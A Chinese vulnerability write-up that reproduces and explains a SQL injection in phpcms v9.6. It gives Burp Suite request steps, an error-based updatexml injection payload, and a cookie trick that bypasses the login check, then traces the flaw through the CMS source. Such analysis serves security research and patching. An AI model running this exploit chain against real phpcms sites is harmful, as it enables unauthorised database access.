phpcms v9.6 注入漏洞详细分析

简介: 本文讲的是phpcms v9.6 注入漏洞详细分析,搭建环境,我在本地搭建域名为www.joke33.com的测试环境。 打开burpsuite,进行拦截。
本文讲的是 phpcms v9.6 注入漏洞详细分析搭建环境,我在本地搭建域名为www.joke33.com的测试环境。

打开burpsuite,进行拦截。

phpcms v9.6 注入漏洞详细分析

打开火狐浏览器,访问有漏洞的网站。

http://www.joke33.com/index.php

phpcms v9.6 注入漏洞详细分析

在burpsuite下可以看到拦截到的数据包,然后选择repeater进行重放。

修改数据包访问,以GET方式访问如下url:

/index.php?m=wap&c=index&a=init&siteid=1

获取一个cookie值。

phpcms v9.6 注入漏洞详细分析

修改数据包,以POST的方式访问如下url:

/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26

传入userid_flash变量,变量的值为刚刚获取到的cookie的值

userid_flash=5ceb9go-1e01hkQc66J1WS7jTWMYriQh6lODXwUnLIiTZh_k

在数据包头的结尾添加(这一步必须要,要不然复现失败。应该数据包的格式要求)

content-Type:application/x-www-form-urlencoded
content-Length:53

提交数据包,回返回一段加密的密文,将这段密文复制下来。

phpcms v9.6 注入漏洞详细分析

修改数据包,以POST的方式访问如下url:

/index.php?m=content&c=down&a_k=b2d2BO0WDcSf_BpiZ3UMBtiFx_4FRMv_1Mf35JQNq_ct__4JuWjwgdJjKmtTIZDn5WJBrexM-Nfg7S9J3QwB8U6vrFk3Fti5iJIkK6Gp6B6-ZSZsRKN4emXDpQAEeOD_IzG3kJ8B8ybdHIdytB3yjB7VI8fLm6fojfZOuCMD2iiERJE4aSBOTBM

a_k的值为上一步返回的那段密文。

提交之后即可成功复现漏洞。

phpcms v9.6 注入漏洞详细分析

我们来分析一下这个漏洞。

我们将漏洞分析分为三个部分:

第一部分

根据最后注入的漏洞url,跟进到phpcmsphpcmsmodulescontentdown.php文件

跟进到init()函数,这边的这几行代码是将$a_k的值进行解密

phpcms v9.6 注入漏洞详细分析

我们echo一下解密后的值

phpcms v9.6 注入漏洞详细分析

现在$a_k里面是一个字符串。

程序在后面会使用parse_str对每个变量进行赋值。(有些变量覆盖漏洞就是parse_str这个函数搞得事情)

phpcms v9.6 注入漏洞详细分析

这里我们分析一下parse_str函数,parse_str函数是将字符串解析成多个变量。

百度了一下,parse_str的大概格式如下:

parse_str("first=value&two=fooz");

中间有一个“&”符号,没有“&”符号会出错

所以,我们在进行注入的时候写的注入语句是

&id=%*27 and updatexml(1,concat(1,(user())),1)#&m=1&f=haha&modelid=2&catid=7&

而不是

id=%*27 and updatexml(1,concat(1,(user())),1)#&m=1&f=haha&modelid=2&catid=7&

如果没有“&”符号,会发现注入的参数会变成空值,那就没有注入漏洞了

经过parse_str函数后,id的值就变成了可注入的值

phpcms v9.6 注入漏洞详细分析

跟进代码的第26行,程序直接用get_one函数带入有注入的语句进行数据库查询,所以导致了sql注入。

phpcms v9.6 注入漏洞详细分析

这边注入点的难点在于,怎么获取有漏洞$a_k,我们接下来看下怎么获取有漏洞$a_k值。

第二部分

跟着漏洞的思路,我们跟进到phpcmsphpcmsmodulesattachmentattachments.php文件

来到241行

phpcms v9.6 注入漏洞详细分析

发现这个src参数有经过safe_replace()函数的处理,但是并没有其他的过滤,我们可以拿过来利用。

我们以get方式传入有注入的src值,传入的参数会被记录到cookie的att_json里面。

phpcms v9.6 注入漏洞详细分析

这里面还有一个问题。

我们调用的swfupload_json()函数是在attachments这个类中,这个类有一个构造函数__construct。

phpcms v9.6 注入漏洞详细分析

我们看到构造函数会判断是否登录。

但是依据第17行的代码,我们可以知道,如果我们POST一个正常存在的userid_flash值,是可以绕过登录判断的。

我们跟进到sys_auth()函数

phpcms v9.6 注入漏洞详细分析

该函数是phpcms内cookie的加密解密函数,所有cookies下加密解密都会经过这个函数。

swfupload_json()函数调用的是sys_auth()的DECODE方式,也就是解密方式,我们可以找到一个调用的是sys_auth()的ENECODE方式的函数就能绕过了。

第三部分

我们跟进到phpcmsphpcmsmoduleswapindex.php文件

看下这个构造函数

phpcms v9.6 注入漏洞详细分析

跟进到set_cookie()函数

phpcms v9.6 注入漏洞详细分析

我们可以看到,set_cookie()这边调用了sys_auth()并且是ENCODE方式,并且计算出来的值保存在cookie里面,我们是可以获取到的。

那我们就可以拿过来用了,到这边我们就可以绕过登录限制了。




原文发布时间为:2017年5月9日
本文作者:angle
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
目录
相关文章
|
7月前
|
存储 PHP
代码审计 | ThinkPHP 5.1控制器定义
代码审计 | ThinkPHP 5.1控制器定义
|
4月前
|
Python
关于SSTI模块注入的常见绕过方法
关于SSTI模块注入的常见绕过方法
69 0
|
7月前
|
前端开发 PHP
代码审计 | ThinkPHP5.1控制器操作
代码审计 | ThinkPHP5.1控制器操作
|
10月前
|
SQL 安全 Linux
Web安全——命令注入漏洞详解
Web安全——命令注入漏洞详解
362 0
|
11月前
|
安全 PHP
Thinkphp5.0.0-5.0.18 RCE分析
本篇文章基于thinkphp5.*框架,分析两种payload的构成以及执行流程
|
11月前
|
存储 SQL 缓存
​WEB常见漏洞之逻辑漏洞(基础原理篇)
​WEB常见漏洞之逻辑漏洞(基础原理篇)
375 0
|
供应链 安全 IDE
【风险预警】Confluence Wiki OGNL注入漏洞(CVE-2022-26134)
【风险预警】Confluence Wiki OGNL注入漏洞(CVE-2022-26134)
【风险预警】Confluence Wiki OGNL注入漏洞(CVE-2022-26134)
|
安全 网络安全 PHP
文件包含漏洞原理解析_1 | 学习笔记
快速学习 文件包含漏洞原理解析_1
92 0
文件包含漏洞原理解析_1 | 学习笔记
|
SQL XML 安全
半小时了解SQL注入漏洞?(注入方式大全+绕过大全)
🏆今日学习目标: 🍀学习了解sql注入漏洞
307 0
半小时了解SQL注入漏洞?(注入方式大全+绕过大全)
|
机器学习/深度学习 安全 网络协议
SSRF漏洞 实战演示超详细讲解
通过SSRF漏洞的学习,我发现SSRF漏洞果然比CSRF漏洞的利用的局限性要小,并且SSRF漏洞对内网的一些应用危害比较大。所以在开发过程中,警惕大家要尽量避免产生SSRF漏洞。